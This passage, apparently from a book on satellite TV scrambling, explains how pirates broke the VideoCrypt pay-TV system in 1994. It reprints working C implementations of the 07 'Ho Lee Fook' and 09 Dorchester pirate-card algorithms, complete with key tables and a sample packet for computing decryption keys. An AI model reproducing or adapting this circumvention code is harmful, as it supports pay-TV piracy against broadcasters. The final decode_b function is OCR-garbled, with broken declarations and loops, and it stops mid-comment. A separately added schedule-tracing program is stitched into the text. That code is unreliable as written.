eight bits wide and has no carry bit. This means that all of the operations are 
one byte wide. Operations like additions or multiplications will therefore be 
lossy. 


When two eight bit numbers are added, the result may be a nine bit number. 
As this function works in eight bits, this ninth bit is lost. To even reverse a 
simple multiplication by two of an eight bit number produces two possible 
inputs that would give the same result. 


In machine code, a multiplication by two simply involves shifting the bits in 
the eight bit register one bit towards the left so that a zero appears in the 
least significant bit. 


Example Of The Shift Left Operation:
Binary          Hex     Decimal
11011011        DB      219
(1)10110110     1B6     438     (multiplied by two)
10110110        B6      182     (ninth bit discarded)


In this example, it can be seen that to multiply by two is merely a question
of shifting all of the bits one step to the left. Of course to divide by two, it is
necessary to shift the bits one step to the right.


Since the ninth bit has been discarded, the divide by two will produce the 
following: 


Example Of The Shift Right Operation: 

            Binary      Hex   Decimal 
            10110110    B6    182 
            01011011    5B    91      (shift right by one bit) 


The problem is that we are not sure if the correct original value was 219 or 
91. Since the ninth bit is discarded, both values will produce a result of 182 
when multiplied by two. 
The same arguments of bit loss apply with the simple addition of two eight 
bit numbers even when one of the numbers is known. There are two 
possible starting numbers. 


So by combining a sequence of multiplications and additions in a fixed 
length register, it is possible to create a function that, while not being 
impossible to reverse as a one way function is, leaves a lot of doubt over 
what the original starting value is. This is effectively how the core function in 
the VideoCrypt 07 hacker algorithm works. It has an elegant simplicity that 
belies its complexity. 


The fragment of C code below is the implementation of the core function. 
The input to the function, byte, is a byte from the message block. The 
output registers r[0..7], the key table key[], the register pointer Ppos and 
the key table offset Offset are globals; they are defined in the full program 
given later in this section. 

/* Core Function - 07 Algorithm */

extern unsigned char r[8];     /* the eight byte wide output registers */
extern unsigned char key[56];  /* the 56 byte key table */
extern int Ppos, Offset;       /* register pointer and key table offset */

void Owf(unsigned char byte)
{
    unsigned char acc, kpoint, k1, k2;

    /* Generate key */
    r[Ppos] ^= byte;                          /* EXOR message byte into current register */
    kpoint = r[Ppos];                         /* the result is the key pointer */
    k1 = key[Offset + (kpoint >> 4)];         /* high nybble addresses the first array */
    k2 = key[Offset + 16 + (kpoint & 0x0f)];  /* low nybble addresses the second array */
    acc = k1 + k2;                            /* eight bit add, ninth bit lost */
    acc = ~acc;                               /* invert */
    acc = (acc << 1) | (acc >> 7);            /* shift left, top bit wrapped round */

    /* Apply function to message byte, key and register */
    acc += byte;                              /* eight bit add, ninth bit lost */
    acc = (acc << 1) | (acc >> 7);            /* shift left */
    acc = (acc >> 4) | (acc << 4);            /* swap nybbles */
    Ppos++;                                   /* increment Ppos */
    Ppos &= 7;                                /* this ensures that the value of Ppos is less than 8 */
    r[Ppos] ^= acc;                           /* EXOR the result into the next register */
}
r[Ppos] is the byte wide output register where Ppos is the pointer to the 
relevant register. 


The first step in the function is to EXOR the message byte with the contents 
of the current output register r[Ppos]. This both changes the contents of the 
current output register r[Ppos] and creates a key pointer, kpoint. 


This key pointer, kpoint, is then used to select the bytes from the two 16 
byte arrays. The bytes are selected by using the high nybble to address the 
first array and the low nybble to address the second array. The 
procedure was detailed earlier. The offset referred to is effectively the value 
to select the correct table from the 56 bytes. 


The two key bytes are then added. The result, acc, is inverted and multiplied 
by two. This multiplication by two is the shift left routine. 


This key is then added to the message byte. The result is multiplied by two. 
Then the high nybble is swapped with the low nybble. 


The procedure to swap the nybbles is simple though in non programming 
terms it looks complex. Basically it is an extension of the shift right to divide 
and shift left to multiply concept. In order to divide by 16, we shift the bits to 
the right four times. The reason for this is that 2^4 = 16. To multiply, it is a 
case of shifting the bits to the left four times. The OR operation is necessary 
to integrate the results of the division by sixteen and the multiplication by 
sixteen into a single number. 


Example Of The Nybble Swap Operation: 

            Binary      Hex   Decimal 
            11011011    DB    219     Original Value 
            00001101    0D    13      Shift to right four times 
            10110000    B0    176     Shift to left four times 


The next procedure is to increment the Ppos pointer so that it points to the 
next r[Ppos]. The value of Ppos is checked to see that it only points to one 
of the eight output registers, r[0..7]. The contents of acc are then EXORed 
with the contents of the register r[Ppos]. 


The core function is relatively straightforward and could be implemented in 
a language other than C. The main problem is the definition of the byte wide 
registers. While this would not be a large problem in some of the more 
structured languages, it can cause problems in QBasic. 
The Ho Lee Fook Algorithm - Single Stage 


[Diagram: one stage of the Ho Lee Fook algorithm. Labelled elements: 
Initial Output Register; Pointer To Key Byte In Array; 256 Element Key 
Array; Core Routine; Next Output Register; Byte From Message Block.] 

In each case the width of each register is a single byte. The 
complete message block is 32 bytes wide and the complete output 
block is eight bytes wide. 


The algorithm when viewed like this is surprisingly linear. The main 
thing to consider is that the function of adding or multiplying by two is 
lossy. Therefore to reverse one of these functions leaves two possible 
answers. 
3: The 07 HLF Algorithm In Operation 


The strength of the HLF algorithm lies in the fact that the core function is 
applied ninety nine times. The thirty two byte message block is transformed 
into the eight byte output block. The application sequence is shown below. 


Input Byte        Processing 

msg[0..26]        Processed Through Function Once 
0                 Processed Through Function Twice 
msg[27..29]       Processed Through Function Twice 
msg[31]           Processed Through Function 64 Times 


The thirty second byte, Byte 31, is intended to make it exceedingly difficult 
to reverse the algorithm. This byte is often referred to as the “destructor 
byte”. The thirty first byte, Byte 30, is not processed through the core 
function. This byte along with bytes 27,28,29, is used to provide the 
checksum for the packet. 


In the manner that the algorithm transforms the thirty two byte message 
block to the eight byte output block, it is more akin to a message digest. 
Instead of a single decryption key being extracted from the datastream, as 
is the case with VideoCipher and EuroCrypt, the whole packet effectively 
becomes the encrypted key. 


If any of the bytes are wrong then the resultant output block will be wrong. In 
this respect it is very elegant. The integrity of the authorisation data, channel 
identification and decryption information is guaranteed. The official card will 
reject any packet that fails the checksum. This means that the card cannot 
be authorised by hackers who do not know what the card identity and 
checksumming routines are. 


Of course if a hacker knew the checksumming procedure, turn-on command 
and had a valid algorithm with key table, the system is wide open. 
This is exactly what happened with the Phoenix and Genesis programs. 


From the knowledge gleaned from the previous sections, it is now possible 
to draw a rather simplified model of the HLF algorithm in operation. The 
model shown is effectively cyclic. 


The distribution of the bytes from the message block among the output 
registers is linear as far as byte 26. For the checksum routine, the pattern 
changes but after this routine, the pattern resumes the cyclic structure. 
A Simplified Model Of the HLF Algorithm 


[Diagram: the Output Registers and the Owf Function.] 


The + in each case represents Modulo 2 addition or EXORing. The 
text r + m indicates that the message byte is EXORed with the contents 
of the register. Some of the EXOR stages, such as the EXORing of the 
message byte, m, with the relevant output register, r, and the 
EXORing of the output of the function f(k_j + m) with the relevant 
output register, r, are omitted for clarity. To see how the individual 
stages are constructed refer to the diagram on page 6-40. 
Distribution Of Message Block Bytes 


Output register   Message byte EXORed in (in order of application) 

r[0]              00 08 16 24 -- 31 31 31 31 31 31 31 31 
r[1]              01 09 17 25 28 31 31 31 31 31 31 31 31 
r[2]              02 10 18 26 28 31 31 31 31 31 31 31 31 
r[3]              03 11 19 *0 -- 31 31 31 31 31 31 31 31 
r[4]              04 12 20 *0 29 31 31 31 31 31 31 31 31 
r[5]              05 13 21 -- 29 31 31 31 31 31 31 31 31 
r[6]              06 14 22 27 -- 31 31 31 31 31 31 31 31 
r[7]              07 15 23 27 31 31 31 31 31 31 31 31 

*0 is where the value 0 is used instead of a byte from the message block. 
This happens for the first two rounds of the checksum routine. Where the 
symbol -- appears, the register is skipped. Also if you count the number of 
times that byte 31 is applied to each register, you will see that it is applied 
eight times to each register. 




This pattern also repeats, though offset by one register, in the application of 
the output of the core function. The difference here is that the processing of 
the *0 bytes does produce different results. 


Distribution Of Core Function Output Bytes 


Output register   Round whose core output is EXORed into the register 

r[0]              -- 07 15 23 30 35 43 51 59 67 75 83 91 
r[1]              00 08 16 24 -- 36 44 52 60 68 76 84 92 
r[2]              01 09 17 25 31 37 45 53 61 69 77 85 93 
r[3]              02 10 18 26 32 38 46 54 62 70 78 86 94 
r[4]              03 11 19 27 -- 39 47 55 63 71 79 87 95 
r[5]              04 12 20 28 33 40 48 56 64 72 80 88 96 
r[6]              05 13 21 -- 34 41 49 57 65 73 81 89 97 
r[7]              06 14 22 29 -- 42 50 58 66 74 82 90 98 

The basic model shows that in each round there are changes to two of the 
output registers. The register at the start of the round has the message byte 
EXORed with it. This now becomes the key pointer for the core function. 
The output of the core function is then EXORed with the contents of the next 
output register. 
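As an added example (not code from the book), the C program below derives the register schedule behind the two distribution tables from the 27-4-1 packet structure alone: it needs no key table or message data, because which register a round touches depends only on the control flow of the checksum routine. Rounds are numbered from 0 as in the tables, and ZERO_BYTE is a constructed marker for the constant 0 fed in during the first two checksum rounds.

```c
/* Added example: traces which output register each round of the 07 HLF
 * algorithm reads (input byte EXORed in) and writes (core output EXORed
 * in). Only the packet structure matters, so no key or message bytes. */
#include <stdio.h>

#define ROUNDS 99          /* 27 + 2*4 + 64 calls of the core function */
#define ZERO_BYTE (-1)     /* constructed marker for the constant 0 input */

typedef struct {
    int src[ROUNDS];       /* message byte index applied in round n */
    int in_reg[ROUNDS];    /* register the input byte is EXORed into */
    int out_reg[ROUNDS];   /* register that receives the core output */
} schedule_t;

/* One call of the core function: the input goes into r[ppos], then ppos
 * advances and the output is EXORed into the new r[ppos]. */
static void step(schedule_t *s, int *n, int *ppos, int src)
{
    s->src[*n] = src;
    s->in_reg[*n] = *ppos;
    *ppos = (*ppos + 1) & 7;
    s->out_reg[*n] = *ppos;
    (*n)++;
}

/* Mirrors the control flow of main() in the 07 program on this page. */
static void build_schedule(schedule_t *s)
{
    int n = 0, ppos = 0, a, b = ZERO_BYTE;

    for (a = 0; a < 27; a++)            /* bytes 0..26, once each */
        step(s, &n, &ppos, a);

    for (a = 27; a < 31; a++) {         /* checksum routine */
        step(s, &n, &ppos, b);          /* previous byte twice (0 first) */
        step(s, &n, &ppos, b);
        b = a;                          /* msg[a] is compared with r[ppos] */
        ppos = (ppos + 1) & 7;          /* and that register is skipped */
    }

    for (a = 0; a < 64; a++)            /* destructor byte, 64 times */
        step(s, &n, &ppos, 31);
}

/* Number of times message byte src (or ZERO_BYTE) is EXORed into r[reg]. */
int times_applied(int src, int reg)
{
    schedule_t s;
    int n, count = 0;
    build_schedule(&s);
    for (n = 0; n < ROUNDS; n++)
        if (s.src[n] == src && s.in_reg[n] == reg)
            count++;
    return count;
}

/* Register that receives the core function output in the given round,
 * or -1 if the round number is out of range. */
int output_register(int round)
{
    schedule_t s;
    if (round < 0 || round >= ROUNDS) return -1;
    build_schedule(&s);
    return s.out_reg[round];
}

int main(void)
{
    schedule_t s;
    int reg, n;
    build_schedule(&s);
    printf("Register : rounds whose core output lands in it\n");
    for (reg = 0; reg < 8; reg++) {
        printf("r[%d]     :", reg);
        for (n = 0; n < ROUNDS; n++)
            if (s.out_reg[n] == reg) printf(" %02d", n);
        printf("\n");
    }
    return 0;
}
```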


The program shown below is the implementation of the 07 HLF algorithm 
without the major checks for ECMs. Changing the message block is simply 
a matter of overwriting the current values and recompiling. It was written 
and compiled with Turbo C++. 
#include <stdio.h>

/* This is a model of the Ho Lee Fook Algorithm
   as used in the hack on VideoCrypt. */

/* The 56 byte key table. The three key tables overlap: Offset selects
   a 16 byte array for the high nybble and, 16 bytes further on, a
   16 byte array for the low nybble. */
unsigned char key[56] = {
    0x65, 0xe7, 0x71, 0x1a, 0xb4, 0x88, 0xd7, 0x76,
    0x28, 0xa0, 0x4c, 0x6e, 0x86, 0x8c, 0xc8, 0x43,
    0xa9, 0xec, 0x60, 0x42, 0x05, 0xf2, 0x3d, 0x1c,
    0x6c, 0xbc, 0xaf, 0xc3, 0x2b, 0xb5, 0xdc, 0x90,
    0xf9, 0x05, 0xea, 0x51, 0x46, 0x9d, 0xe2, 0x60,
    0x70, 0x52, 0x67, 0x26, 0x61, 0x49, 0x42, 0x09,
    0x50, 0x99, 0x90, 0xa2, 0x36, 0x0e, 0xfd, 0x39
};

unsigned char r[8]; /* This is the key output */

/* This is the message packet */
unsigned char msg[32] = {
    0xf8,0x3f,0x6a,0x29,0x51,0x19,0x01,0x8a,
    0xa7,0xbc,0x50,0xeb,0xec,0xed,0xee,0xef,
    0xf0,0xf1,0xf2,0xf3,0xf4,0xf5,0xf6,0xf7,
    0xf8,0xf9,0xfa,0x8c,0x7a,0x20,0xff,0x41
};

int Ppos = 0, Offset = 0;

/* Core Function */
void Owf(unsigned char byte)
{
    unsigned char acc, kpoint, k1, k2;
    r[Ppos] ^= byte;
    kpoint = r[Ppos];
    k1 = key[Offset + (kpoint >> 4)];
    k2 = key[Offset + 16 + (kpoint & 0x0f)];
    acc = k1 + k2;
    acc = ~acc;
    acc = (acc << 1) | (acc >> 7);
    acc += byte;
    acc = (acc << 1) | (acc >> 7);
    acc = (acc >> 4) | (acc << 4);
    Ppos++;
    Ppos &= 7;
    r[Ppos] ^= acc;
}

int main(void)
{
    unsigned char a, b = 0;
    for (a = 0; a < 8; a++) r[a] = 0;      /* initialise key */
    if (msg[1] < 0x33)                     /* Calculate Offset */
        Offset = 0x00;
    else if (msg[1] < 0x3b)
        Offset = 0x08;
    else
        Offset = 0x18;

    printf(" Offset (in hex) = ");
    printf("%X", Offset);
    printf("\n");
    for (a = 0; a < 27; a++)
        Owf(msg[a]);

    /* Checksumming Routine */
    printf("\n * Checksumming Routine * \n");
    printf(" Conditions: valid checksum if msg[a] == r[Ppos] \n");
    printf(" If this routine is omitted then the algorithm \n");
    printf(" will decrypt any msg packet without actually \n");
    printf(" checking to see if it is valid. \n\n");
    for (a = 27; a < 31; a++)
    {
        Owf(b);
        Owf(b);
        b = msg[a];
        printf(" %X ", msg[a]);
        printf(" %X ", r[Ppos]);
        if (msg[a] != r[Ppos])
            { putchar(7); printf(" Invalid Checksum Result \n"); }
        else printf(" Valid Checksum Result \n");
        Ppos++; Ppos &= 0x07;
    }
    for (a = 0; a < 64; a++) Owf(msg[31]);  /* Apply Destructor Byte */

    printf(" \n Message Block: \n");
    for (a = 0; a < 16; a++)
        printf(" %X ", msg[a]);
    printf("\n");
    for (a = 16; a < 32; a++)
        printf(" %X ", msg[a]);
    printf("\n"); printf("\n");
    printf(" The decrypt key is: \n");
    for (a = 0; a < 8; a++) printf(" %x ", r[a]);
    printf("\n");
    return 0;
}
Dark Wednesday And Beyond 


It was getting a bit like that scene in Monty Python's “Holy Grail”. You know, 
the one where the knight claims he is able to fight even after multiple limb 
amputations and decapitation. For at least a year, the VideoCrypt system 
had been totally and utterly hacked and Sky and News Datacom had tried 
everything short of a new card issue to stop the hack. 


On May 18th, 1994 the 09 card went into operation and the hacker cards 
stopped. In the annals of satellite piracy, the day is known as Dark 
Wednesday. All over Europe there was panic though some were handling it 
better than others. Some card dealers had disappeared fearing the worst 
from their customers. 


At first, there were hopes that it was just another countermeasure. The 
packet structure seemed much the same. The main difference was that 
message byte 1, the card age byte, now pointed to a table outside the 
regular three tables. It was the 09 card. 


When the original Ho Lee Fook hack occurred, the resources committed 
were not even a tenth as strong as those arrayed against the 09 card. The 
OMIGOD hack opened up the structure of the VideoCrypt system to mass 
analysis. This hack was used as the starting point for the hack on the 09. 


Initially it was a case of doom and gloom all around. The pirates and 
hackers were frustrated by the new card. But there were other things going 
on that most people, News Datacom and Sky included, did not even know 
about. 


On June 20th, roughly a month after the transition to 09, there was an 
auction of 09 code. This gave the pirates and hackers new hope - until it 
was ECMed a week or so later. But it did lay the foundations for the 
complete hacking of the 09 card. 


The complete, or at least stable, hack of the 09 card did not occur until late 
October 1994. The time between the transition and the hack was 
approximately five months. This now seems to be a pattern with Sky card 
issues. 


When VideoCrypt was launched, it was supposed to be the ultimate 
scrambling system. To date it has been the ultimate in one thing only - 
disasters. From the Infinite Lives hack to the Kentucky Fried Chip to the Ho 
Lee Fook 10, the system has been repeatedly hacked. The hackers now 
know more about the system than most of the channels that use it. Every 
one of the microcontrollers in the VideoCrypt decoders has been popped. 
Their programs have been dumped and analysed. 
Perhaps the main problem is that the security overlay was not developed in 
an electronically hostile environment. This was evident from the papers 
presented in the Irish High Court. The software development of the access 
control and subscription management appeared to have been carried out in 
the USA and Israel. The people who developed it appeared to be very good 
academics and fell into that old trap. They were, like many designers, 
blinded by their own brilliance. However commercial piracy does not respect 
such niceties and there was just too much money at stake to leave the 
cards unhacked. 


As a system, VideoCrypt is actually good. It does have possibilities but the 
fact that it was designed in the eighties weighs heavily against it. The 
Frozen Architecture was the ruling format for scrambling systems but the 
smart card was adding some flexibility. The security of the system now only 
depends on the smart card. If the smart card can be reverse engineered, 
there is little that can be done to maintain the system's integrity. Admittedly, 
the channel can implement ECMs on a regular basis but that is, in the 
present environment, counterproductive. The implementation of repeated 
ECMs with the 07 and 09 Sky cards forced the hackers to innovate. The 
result was the battery card where the card user could punch in the fix for the 
ECM on a keypad on the card or via the television’s remote control. 


VideoCrypt would have been a lot more successful as a sporadically 
deployed system. It does not appear to have been designed as a generic 
scrambling system, or indeed to handle the present volume of subscribers. 
Blacklisting in a system should be extremely fast. The problem is that it has 
become the de-facto scrambling system for English language channels. 
This has given News Datacom and Sky a monopolistic stranglehold on the 
English language satellite television market. 


It seems that at this point in time the only things the future holds for 
VideoCrypt are hacks and a slow extinction as the digital systems come 
on-line. The response of News Datacom and Sky to these hacks will 
probably be the same - they will waste money on legal action while trying to 
develop a more secure smart card aspect. Meanwhile the ECM-ECCM 
battles will continue. 


As in times past, the warm waters of the Caribbean beckoned the European 
pirates. The prey this time was the DirecTv system. News Datacom 
supplied the security overlay for this system. The security overlay, known as 
VideoGuard, is the digital version of the VideoCrypt system. However it is 
more flexible and more advanced. The hack on this system was carried out 
by North American hackers. 
The same claims were being made about the DirecTv system as were 
made about VideoCrypt. All the same old waffle about how great the people 
who designed the algorithms are, how the card can be replaced if there is a 
hack, the wonderful adoring publicity pieces in the trade publications. 
Strangely none of the DirecTv publicity mentions anything about the hacking 
of VideoCrypt and the effect of fiscal reality on the “Detachable Secure 
Microcontroller” theory. 


DirecTv's system was hacked and battery cards are being openly marketed 
in magazines and on the internet. They have a major problem - they 
believed the hype. Of course the problem has not reached the magnitude of 
the Sky situation. The current estimate of pirate cards is that there are 
under 200,000 pirate cards in the market. 


The latest information indicates that there is a Phoenix hack that is now 
being used on the DirecTv system. This is perhaps the most dangerous 
form of hack as it is aimed directly at the official smart card. It can activate 
all channels and give the card PPV facilities. 


Unlike BSkyB and VideoCrypt, the PPV element on the DirecTv system 
forms a major part of programming. On BSkyB, PPV is a sporadic event 
perhaps once or twice a year. A Phoenix hack on the PPV element of 
DirecTv therefore has a far greater effect in terms of financial loss to the 
channels. 


DirecTv will switch cards probably in October but until that time, the system 
is compromised. However what will happen after that is more important. 
The word is that the hackers are ready and waiting. There are of course 
some rather typical displays of bravado with claims that the new card can 
easily be hacked. There is no such thing as an easy hack on a smart card. 


If News Datacom follows the pattern of the initial DirecTv card, then they will 
base the new DirecTv on the Sky 10 card. Given that piracy in Europe will 
be illegal throughout the European Community in the next year or so, 
European hackers have already made plans. Of course so too have News 
Datacom and DirecTv. 
The 09 Algorithm 18:05:94 - 27:06:94 


On 20/06/1994, there was a very strange event. There was an auction in the 
Dorchester hotel in London. It was the item on offer that staggered belief. 
The item was a full working copy of the 09 Sky code. Faxes were 
transmitted to all interested parties. There was even a number of pages of 
commented machine code to illustrate the provenance of the software. 


Needless to say this did not last very long as Sky struck back with another 
electronic countermeasure. The best analogy for this ECM is a scorpion. It 
had a very nasty sting in the tail. 


The auctioned code only lasted for a week before Sky and News Datacom 
implemented their electronic countermeasure. The effect of this ECM was 
total. 


The code released on 20/06/1994 was incomplete. However many of the 
ideas used in the 07 code were carried over into the 09 release. The original 
design concepts are there, but they had been modified. The intent of these 
modifications appears to have been to make the algorithm more secure. It 
did. 

Many of the ideas that were in the 07 algorithm can be found in the 09 
algorithm. However the 09 algorithm is far more secure and is also more 
difficult to reverse. 


One of the essential elements of the 09 algorithm is that it uses 
multiplication in the core function. This is perhaps a direct attack on the 
PIC16C84 microcontroller that formed the heart of the 07 pirate smart card 
industry. The PIC16C84 microcontroller does not have a multiply instruction. 


The 09 Key Tables And Key Selection: 


The size of the initial key table in the 09 code is 216 bytes as opposed to a 
typical 56 bytes in the 07 code. The concept of code table reuse is present 
in the 09. 


The segment of the code table to be used for key generation in each round 
is selected using an offset derived from the message packet. There are 
three known selections. Two of the selections allow the use of a single 64 
byte array in the key generation. The other selection uses the EXOR sum of 
two 64 byte arrays. 


In the 07 code the key bytes were used in pairs. There were two 16 byte key 
arrays. The arrays have been increased to 64 bytes each in the 09 code. 
Though most of the options in the version released use a single 64 byte 
array, there is a provision for a combination of two arrays. This dual array 
option was used up to 26:06:94. 


The key combination function, addition in the 07 code, has been changed to 
EXOR in the version of the 09 code under examination. Though the reason 
for the change is not known, it could have been intended to frustrate 
attempts to read out the key bytes. 


The 09 Core Function 


This is perhaps the greatest change in the overall structure of the algorithm. 
Whereas the 07 code only operated on a pair of the output registers during 
any round, the 09 code operates on all eight of the output registers. 


The fact that the contents of all of the eight change after each round means 
that the simplified attacks on the bytes before the checksum bytes in 
version 07 will not work with this algorithm. 


The structure of the 09 core function is effectively four routines. The first 
three are identical and operate on r[2 to 7]. The final routine, while being 
similar to the preceding routine, introduces a number of constants. This 
routine operates on r[0] and r[1]. 


The first three stages use different keys. The pointer to the key byte is 
derived by ANDing the starting output register with 3Fh. This ensures that 
there are only 64 possible values for the pointer. This pointer value has an 
offset added to select the correct byte. This offset can be set using a byte in 
the message packet. In the version that Sky nuked, the following selection 
was used: 


k1 = r[i] & 0x3F;            /* six bit pointer into the key table */

k = key[k1] ^ key[k1 + 0x98]; /* EXOR of two 64 byte arrays */

The process used in both routines is multiplication. The result of the 
multiplication is a sixteen bit number. This result is broken into two bytes 
which are then combined with the contents of the two output registers affected 
by the stage. 


In the first routine, the multiplication operates on the combination of the 
message byte, the key byte and three of the output registers. The message 
byte is modified for stages two and three. 


The second routine multiplies the contents of output registers r[6] and r[7]. 
The high and low byte are distributed over r[1] and r[0]. The contents of 
these registers then have a constant added and also can be incremented by 
one depending on whether the result meets the condition of an IF 
statement. 


[Diagram: Model Of 09 Core Function. Labels: Routine 1 (Stage 1); m[n]'.] 


The 09 core function depends on two routines. The first is used three 
times and the last is only used once. 


The key byte, k_n, is only applied in the first stage. The message 
byte, m[n], is applied in the first stage. It is then multiplied by two and 
has a constant added to the result. This new value, m[n]', is used in 
Stage 2. The process is repeated to give m[n]''. This value is used in 
Stage 3. 


Stage 4 uses a different routine to the previous stages. This 
particular routine is similar to the previous one but it does introduce a 
number of constants. The key byte and message bytes are not used in 
this stage. 


In each stage, the contents of only two registers are changed. In the 
diagram these are the boxed r_n registers. The rounded boxes are 
registers used in each round but the contents of which do not actually 
change. 


The Structure Of The Code 


The surprising thing about the Dorchester 09 code is that it uses the same 
27 - 4 - 1 structure as the 07 code. The first 27 bytes are processed once each, 
the next four bytes are used to provide the checksum for the packet and the 
last byte is processed sixty four times. 


The checksum routine was largely the same as that for the 07 except that it 
now checked the contents of output register r[7] against the message byte. 


Apparently up to issue 09, the subscription management software was 
dependent on this structure of the message packet, so only minor 
modifications to the sequencing could be made for the 09 card. 


After The ECM 


The ECM on 27/06/1994 effectively knocked out the Dorchester code basic 
algorithm. What had been in use up to this point had been the transitional 
version of the algorithm. The pirates who had purchased the code at the 
Dorchester auction had not purchased the whole code. That was on sale for 
£300,000 but nobody had apparently bought it. What followed was a long 
hot summer of very hard work. 


The pressure on hackers to either crack the code and to reverse-engineer 
the 09 card was immense. It was going to be late October before there was 
a stable pirate 09 card. It was a combination of the Dorchester code and 
code reverse engineered from the 09 smart card. 


The ECM was, in essence, simple. What had changed was the algorithm 
itself. News Datacom had integrated subcommands (nanocommands - see 
Chapter 7) into the 74h packet. These nanocommands allowed the hash 
function to be executed with different input data or a different number of 
times. In fact some of these nanocommands were downright devious in that 
they allowed the card memory to be reprogrammed. 


The use of nanocommands left hackers paralysed in trances of 
cryptographic theory. The hackers working for the pirates were measuring the 
execution times of the functions in the card, counting clock cycles and were 
also checking current drawn. Pirates were left without cards to sell and Sky 
were happy again. Once again their system was secure - but not for long. 
This is the Core Function of the 09 Dorchester Code. It is more complex 
than the 07 Core Function in that it changes the contents of all of the 
answer registers in each round. (key selection simplified) 


/* The 09 Core Function */
extern const unsigned char key09[216];   /* the 216 byte key table listed below */

void Owf09(const unsigned char in, unsigned char *r)
{
    unsigned char a, b, c, d, key;
    unsigned short acc;
    int i;
    a = in;
    /* Routine 1 - affects r[2], r[3], r[4], r[5], r[6], r[7] */
    for (i = 0; i <= 4; i += 2) {
        b = r[i] & 0x3f;
        /* simplified key selection */
        key = key09[b] ^ key09[b + 0x98];
        c = a + key - r[i+1];
        d = (r[i] - r[i+1]) ^ a;
        acc = d * c;                       /* sixteen bit product */
        /* EXOR low byte of result with r[i+2] */
        r[i + 2] ^= (acc & 0xff);
        /* Add high byte of result to r[i+3] */
        r[i + 3] += acc >> 8;
        /* modify the message byte for the next stage */
        a = (a << 1) | (a >> 7);
        a += 0x49;
    }
    /* Routine 2 - affects r[0], r[1] */
    acc = r[6] * r[7];
    /* Add low byte of result to r[0] */
    a = (acc & 0xff) + r[0];
    if (a < r[0]) a++;                     /* carry out of the byte wraps round */
    r[0] = a + 0x39;
    /* Add high byte of result to r[1] */
    a = (acc >> 8) + r[1];
    if (a < r[1]) a++;
    r[1] = a + 0x8f;
    return;
}
The Dorchester Code Transcoded From PIC to C 


This code is reproduced here courtesy of Markus Kuhn. 


/*
 * This is the algorithm and key as used in a PIC16C84
 * BSkyB clone card. It worked fine between 1994-05-18
 * and 1994-06-27. It still produces the correct signature,
 * but not the correct hash result after 1994-06-28.
 *
 * MK, 1994-06-30
 */


const unsigned char key09[216] = {
    0x91, 0x61, 0x9d, 0x53, 0xb3, 0x27, 0xd5, 0xd9,
    0x0f, 0x59, 0xa6, 0x6f, 0x73, 0xfb, 0x99, 0x4c,
    0xfb, 0x45, 0x54, 0x8e, 0x20, 0x5f, 0xb3, 0xb1,
    0x38, 0x40, 0x6b, 0xa7, 0x40, 0x39, 0xed, 0x2a,
    0xda, 0x43, 0x8d, 0x51, 0x92, 0xd6, 0xe3, 0x61,
    0x65, 0x8c, 0x71, 0xe6, 0x84, 0x65, 0x87, 0x03,
    0x55, 0xbc, 0x64, 0x07, 0xbb, 0x79, 0x9e, 0x40,
    0x97, 0x89, 0xc4, 0x14, 0x8f, 0x8b, 0x41, 0x4d,
    0x2a, 0xaa, 0xe8, 0xe1, 0x08, 0xcd, 0x82, 0x43,
    0x8f, 0x6f, 0x36, 0x9b, 0x72, 0x47, 0xf2, 0xa4,
    0x49, 0xdd, 0x8b, 0x6e, 0x26, 0xc6, 0xbf, 0xb7,
    0xd8, 0x44, 0xc3, 0x70, 0xa3, 0x4c, 0xb6, 0xb2,
    0x37, 0x9b, 0x09, 0xdf, 0x32, 0x28, 0x24, 0x86,
    0x8d, 0x5f, 0xe6, 0x4b, 0x5d, 0xd0, 0x2f, 0xdb,
    0xac, 0x2e, 0x78, 0x1e, 0xcc, 0x52, 0xc1, 0x61,
    0xea, 0x82, 0xca, 0xb3, 0xf4, 0x8f, 0x63, 0x8e,
    0x6c, 0xbc, 0xaf, 0xc3, 0x2b, 0xb5, 0xdc, 0x90,
    0xf9, 0x05, 0xea, 0x51, 0x46, 0x9d, 0xe2, 0x60,
    0x01, 0x35, 0x59, 0x79, 0x00, 0x00, 0x55, 0x0f,
    0x00, 0x00, 0x00, 0x00, 0x10, 0x6e, 0x1c, 0xbd,
    0xfe, 0x44, 0xeb, 0x79, 0xf3, 0xab, 0x5d, 0x23,
    0xb3, 0x20, 0xd2, 0xe7, 0xfc, 0x00, 0x03, 0x6f,
    0xd8, 0xb7, 0xf7, 0xf3, 0x55, 0x72, 0x47, 0x13,
    0x7b, 0x0c, 0x08, 0x01, 0x8a, 0x2c, 0x70, 0x56,
    0x0a, 0x85, 0x18, 0x14, 0x43, 0xc9, 0x46, 0x64,
    0x6c, 0x9a, 0x99, 0x59, 0x0a, 0x6c, 0x40, 0xd5,
    0x17, 0xb3, 0x2c, 0x69, 0x41, 0xe8, 0xe7, 0x0e
};


/*
 * Only 64 bytes of this table were used. This allowed some
 * implementations to reduce the key selection routine and the key
 * storage. This resulted in a significant memory saving in the
 * PIC16C84 implementations.
 */


void kernel_b(const unsigned char in, unsigned char *answ,
              const unsigned char sel)
{
    unsigned char a, b, c, d;
    unsigned short m;
    int i;
    a = in;
    /* Routine 1 */
    for (i = 0; i <= 4; i += 2) {
        b = answ[i] & 0x3f;
        if (sel <= 8) {
            if (sel == 2) b = key09[b + 0x40];
            else {
                if (sel < 2 && b == 0) b = key09[b + 0x8d];
                else
                    b = key09[b] ^ key09[b + 0x98];
            }
        } else
            b = key09[b] ^ key09[b + 0x98]; /* only this one is used */
        c = a + b - answ[i+1];
        d = (answ[i] - answ[i+1]) ^ a;
        m = d * c;
        answ[i + 2] ^= (m & 0xff);
        answ[i + 3] += m >> 8;
        a = (a << 1) | (a >> 7);
        a += 0x49;
    }

    /* Routine 2 */
    m = answ[6] * answ[7];
    a = (m & 0xff) + answ[0];
    if (a < answ[0]) a++;
    answ[0] = a + 0x39;
    a = (m >> 8) + answ[1];
    if (a < answ[1]) a++;
    answ[1] = a + 0x8f;
    return;
}

int decode_b(const unsigned char *msg, unsigned char *answ) 
{ 

inti, 3; 

int check = 0; 

unsigned char b = 0; 
for (120; 1 <8; i++) answ[i] = 0; /* Clear answer regs */ 


for (120; 1 < 27; i++) /* Do Kernel */ 
kernel_b(msg[i], answ, msg[1]); 


/* Hash Checksum */ 

for (1 = 27; i < 31; i++) { 
kernel_b(b, answ, msg[1]); 
kernel_b(b, answ, msg[1]); 


b = msg[i]; 
if (b != answ[7]) check |=1; 
} 


/* Process Last Byte */ 
    /*
     * This is the point at which the processing changed after the ECM of
     * 27-06-94. Depending on a card command sent in the 74h, the card
     * would execute a series of nanocommands which handled the
     * processing differently. The packet would of course have a valid
